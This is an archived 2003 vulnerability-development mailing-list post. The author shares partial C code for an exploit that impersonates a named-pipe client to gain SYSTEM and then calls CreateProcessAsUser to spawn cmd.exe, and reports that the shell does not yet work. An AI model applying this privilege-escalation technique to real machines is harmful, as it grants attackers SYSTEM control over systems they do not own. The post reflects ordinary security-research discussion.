Vuln Dev
Named Pipe Impersonation -> CreateProcessAsUser(); Jul 14 2003 07:45PM
wirepair (wirepair roguemail net) (1 replies)
Hello, I'm attempting to finish up my exploit for the
@stake advisory, i've hit quite a snag when i found out
that calling a new process does not inherit the privileges
of the named pipe. (I must have been thinking of fork() or
something heh). So I can impersonate SYSTEM, but I can not
create a new process with these nice privileges. Here is
where i am at:
ConnectNamedPipe() <-- yada yada wait for connection
if (!ImpersonateNamedPipeClient (hPipe)) // impersonate
the pipe so we now are SYSTEM.
{
printf ("Failed to impersonate the named pipe.\n");
CloseHandle(hPipe);
return 5;
}
// found this on msdn, i'm trying to get a token with full
access, then call CreateProcessAsUser();
if (!OpenThreadToken(GetCurrentThread(),
TOKEN_ALL_ACCESS, TRUE, &hToken )) {
if (hToken != INVALID_HANDLE_VALUE) {
CloseHandle(hToken);
printf("damn: %u\n", GetLastError());
}
}

MapGenericMask( &dwAccessDesired, pGeneric ); //this i'm
kinda shady on, looks like i'm just mapping the id to the
SYSTEM name? when i call GetUserName i get garble after
the OpenThreadToken unless i call MapGenericMask...

CreateProcessAsUser(hToken, "cmd.exe",
NULL,NULL,NULL,true,NULL,NULL,NULL,&si, &pi);
CloseHandle(hPipe);

now i call createprocessasuser, using the token from
openthreadtoken. In the debugger, it tries to execute cmd,
but but i get nothing back... if anyone wants to see my
code it's at http://sh0dan.org/files/tac0tac0.c... Thanks
this is starting to bug me :),
-wire
_____________________________
For the best comics, toys, movies, and more,
please visit <http://www.tfaw.com/?qt=wmf>

[ reply ]
Re: Named Pipe Impersonation -> CreateProcessAsUser(); Jul 14 2003 08:13PM
Blue Boar (BlueBoar thievco com)


 

Privacy Statement
Copyright 2010, SecurityFocus